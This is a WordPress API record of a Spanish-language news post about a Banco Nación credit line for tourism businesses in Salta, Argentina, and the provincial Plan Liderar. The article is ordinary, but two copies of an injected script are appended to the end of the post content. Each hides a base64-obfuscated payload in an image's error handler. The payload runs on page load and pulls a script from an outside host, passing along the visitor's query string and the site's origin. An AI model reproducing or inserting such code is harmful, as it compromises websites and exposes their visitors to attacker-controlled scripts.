{"id":2413,"date":"2023-03-27T17:20:55","date_gmt":"2023-03-27T20:20:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2413"},"modified":"2025-08-14T00:20:23","modified_gmt":"2025-08-14T03:20:23","slug":"saenz-presento-una-importante-linea-de-credito-destinada-a-empresas-turisticas-saltenas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2413","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/saenz-presento-una-importante-linea-de-credito-destinada-a-empresas-turisticas-saltenias-88725\">S\u00e1enz present\u00f3 una importante l\u00ednea de cr\u00e9dito destinada a empresas tur\u00edsticas salte\u00f1as<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#61071e\"><em>El instrumento financiero del Banco Naci\u00f3n se articula con el plan provincial Liderar que sigue consolidando a Salta como uno de los principales destinos en el pa\u00eds y la regi\u00f3n. \u201cEl turismo es una herramienta de desarrollo integral\u201d, dijo el Gobernador.<\/em><\/h3>\n\n\n\n<p>Con la presencia de los representantes de las instituciones tur\u00edsticas de la provincia, el gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;encabez\u00f3 el acto de firma de convenio entre la Provincia y el Banco Naci\u00f3n, por el que se pondr\u00e1 en marcha una nueva l\u00ednea de cr\u00e9dito destinada a micro, peque\u00f1as, medianas y grandes empresas tur\u00edsticas.&nbsp;<\/p>\n\n\n\n<p>El objetivo es dotar de m\u00e1s y mejores recursos al sector para contribuir a su desarrollo y por ello la Provincia subsidiar\u00e1 5 puntos de tasa para las inversiones que se hagan en Salta.<\/p>\n\n\n\n<p>\u201cEl turismo es pol\u00edtica de Estado\u201d, asegur\u00f3 el mandatario y a\u00f1adi\u00f3 que \u201ces una herramienta de desarrollo integral para los salte\u00f1os\u201d.&nbsp;<\/p>\n\n\n\n<p>As\u00ed, el Gobernador manifest\u00f3 que se est\u00e1 trabajando en m\u00e1s de 40 obras tur\u00edsticas en Salta, con el prop\u00f3sito de \u201cmotorizar la generaci\u00f3n de empleo y seguir fortaleciendo un sector clave para la reactivaci\u00f3n econ\u00f3mica de nuestra provincia y del pa\u00eds\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6377-saenz-presento-una-importante-linea-de-credito-destinada-a-empresas-turisticas-saltenias.jpg\" alt=\"\" width=\"299\" height=\"199\"\/><\/figure><\/div>\n\n\n<p>Al respecto enumer\u00f3 algunas de las obras en la provincia como los trabajos en las rutas 40, 51, 9\/34; los proyectos del Centro de Convenciones de Cafayate, del gasoducto de los Valles Calchaqu\u00edes, en el dique Cabra Corral, Aeropuerto de Salta, Telef\u00e9rico Salta, entre otras. \u201cCada una&nbsp;responde&nbsp;a un plan estrat\u00e9gico de desarrollo provincial,&nbsp;para los sectores de la producci\u00f3n y del turismo que tambi\u00e9n benefician a todos los salte\u00f1os\u201d, puntualiz\u00f3 S\u00e1enz.<\/p>\n\n\n\n<p>En este contexto, el Gobernador consider\u00f3 que la nueva l\u00ednea de cr\u00e9dito del Banco Naci\u00f3n se suma a la estrategia provincial del Plan Liderar por el que se invertir\u00e1n 100 millones de d\u00f3lares.<\/p>\n\n\n\n<p>Por el convenio rubricado por el Gobernador y firmado por los ministros de Econom\u00eda y Servicios P\u00fablicos de Salta,&nbsp;<strong>Roberto Dib Ashur;&nbsp;<\/strong>de Turismo y Deportes,&nbsp;Mario Pe\u00f1a,&nbsp;y Ricardo V\u00e9liz,&nbsp;del Banco Naci\u00f3n, se implementar\u00e1 esta herramienta financiera a tasa subsidiada para \u201cque junto con nuestras empresas tur\u00edsticas sigamos convirtiendo a Salta en el coraz\u00f3n del norte argentino\u201d, finaliz\u00f3.&nbsp;<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Salta,\u00a0Gustavo di M\u00e9cola,\u00a0resalt\u00f3 \u201cla empat\u00eda entre los sectores p\u00fablico y privado que se potencian en una sinergia para hacer crecer nuestras capacidades\u201d.<\/p>\n\n\n\n<p><strong>L\u00ednea de cr\u00e9dito<\/strong><\/p>\n\n\n\n<p>La presentaci\u00f3n estuvo a cargo del&nbsp;ministro de Econom\u00eda, quien detall\u00f3 que el monto m\u00ednimo a solicitar es de $100 millones hasta 1.650 millones, con plazo de devoluci\u00f3n de hasta 5 a\u00f1os, incluido el periodo de gracia de hasta 1 a\u00f1o. Cabe destacar que el Ministerio de Turismo y Deportes de la Naci\u00f3n bonifica 14,5 p.p.a. de la tasa de inter\u00e9s durante todo el plazo del cr\u00e9dito.<\/p>\n\n\n\n<p>Podr\u00e1n aplicar aquellas empresas que realicen una actividad vinculada al sector tur\u00edstico (gastronom\u00eda, alojamiento, agencias de viajes, excursiones, etc.) y presenten proyectos estrat\u00e9gicos de inversi\u00f3n para la adquisici\u00f3n de bienes de capital, incluidos rodados y embarcaciones, y\/o la construcci\u00f3n o adecuaci\u00f3n de instalaciones. Adem\u00e1s, se admitir\u00e1 hasta un 20% del monto del cr\u00e9dito otorgado para financiar capital de trabajo asociado a la inversi\u00f3n.<\/p>\n\n\n\n<p>Esta l\u00ednea fue lanzada semanas atr\u00e1s por el ministro de Turismo y Deportes&nbsp;<strong>Mat\u00edas Lammens<\/strong>&nbsp;y el Banco Naci\u00f3n, en el marco del 162\u00b0 Encuentro del Consejo Federal de Turismo (CFT), en la provincia de Tucum\u00e1n.<\/p>\n\n\n\n<p><strong>Plan Liderar<\/strong><\/p>\n\n\n\n<p>Los detalles del plan fueron presentados por el ministro Pe\u00f1a. Dijo que Liderar se sostiene en una inversi\u00f3n progresiva que finalizar\u00e1 con $100 millones de d\u00f3lares en 2027 que permitir\u00e1 el incremento de turistas y por consiguiente de ingresos que, debido a las caracter\u00edsticas de la actividad, impacta de manera integral en otros sectores.<\/p>\n\n\n\n<p>Consider\u00f3 asimismo que la l\u00ednea de cr\u00e9dito presentada apuntala la estrategia provincial en turismo a partir de plan Liderar, favoreciendo con una importante herramienta al sector privado para alcanzar el objetivo de incrementar un 15% la oferta.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"S\u00e1enz present\u00f3 una importante l\u00ednea de cr\u00e9dito destinada a empresas tur\u00edsticas salte\u00f1as\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/mdOWFgBUpuA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/saenz-presento-una-importante-linea-de-credito-destinada-a-empresas-turisticas-saltenias-88725\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El instrumento financiero del Banco Naci\u00f3n se articula con el plan provincial Liderar que sigue consolidando a Salta como uno de los principales destinos en el pa\u00eds y la regi\u00f3n. \u201cEl turismo es una herramienta de desarrollo integral\u201d, dijo el Gobernador. Con la presencia de los representantes de las instituciones tur\u00edsticas de la provincia, el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2414,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2413","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2413"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2413"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2413\/revisions"}],"predecessor-version":[{"id":7134,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2413\/revisions\/7134"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2414"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}